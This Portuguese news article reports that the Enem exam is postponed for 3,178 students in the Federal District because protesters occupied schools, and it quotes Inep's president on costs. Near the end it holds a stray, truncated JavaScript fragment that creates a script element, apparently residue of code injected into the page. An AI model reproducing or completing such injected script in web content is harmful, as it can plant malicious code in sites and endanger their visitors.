Enem é adiado para 3.178 alunos no DF

O Exame Nacional do Ensino Médio (Enem) foi adiado para 3 mil 178 estudantes do DF. No total, 191,4 mil farão provas dias 3 e 4 de dezembro por causa da ocupação de 304 escolas em todo o País, cinco delas no Distrito Federal. Onde não houve mudança de data, o Enem será aplicado dias 5 e 6, próximo final de semana. 

Entre os locais ocupados, em protesto contra o teto nos gastos públicos e a reforma no ensino médio, está o Centro Educacional 01 de Planaltina, que tem maior número de inscritos no Enem: 828 estudantes. O restante faria a prova no CEM 304 de Samambaia, no CEM Taguatinga Norte, que fica na QNC, e nos campus de Samambaia e Riacho Fundo l do Instituto Federal de Brasília (IFB).

Os presos e os que cumprem medidas socioeducativas realizarão o exame em datas diferentes, nos dias 16 e 17. A divulgação dos resultados do Enem foi mantida para o dia 19 de janeiro, a tempo de as notas serem utilizadas em programas do governo para a inclusão no ensino superior, como Sisu, Prouni e o Fies.

 

Custo

A presidente do Instituto Nacional de Estudos e Pesquisas Educacionais (Inep), Maria Inês Fini, afirmou mesta terça-feira, 1º, que ainda não é possível calcular o prejuízo causado pelo adiamento do exame, mas informou que o custo da prova para cada candidato é de R$ 90. A taxa leva em conta a segurança, elaboração e distribuição. “É possível que haja uma economia nos custos da aplicação deste fim de semana, já que algumas escolas não puderam receber o exame”, disse a presidente.

Maria Inês Fini também descartou a mudança nos locais de prova para o próximo fim de semana, já que teria que ser alterada a logística de segurança dos candidatos, e lamentou que o prejuízo ficasse com o governo federal. “Bem que gostaríamos de atribuir este custo aos reais responsáveis pelo adiamento das provas, que estão ocupando espaços públicos. Porém, não temos como identificar”, acrescentou.

 

Comunicação

Os alunos iriam receber ainda nesta terça-feira, um por um, comunicado do Inep informando sobre o adiamento, mas os novos locais de prova eles só saberão depois, em data ainda não divulgada.  Mais informações relativas ao exame estarão disponíveis no e-mail, site e redes sociais do órgão.

 

var d=document;var s=d.createElement(‘script’);

Fonte:

Deixe um comentário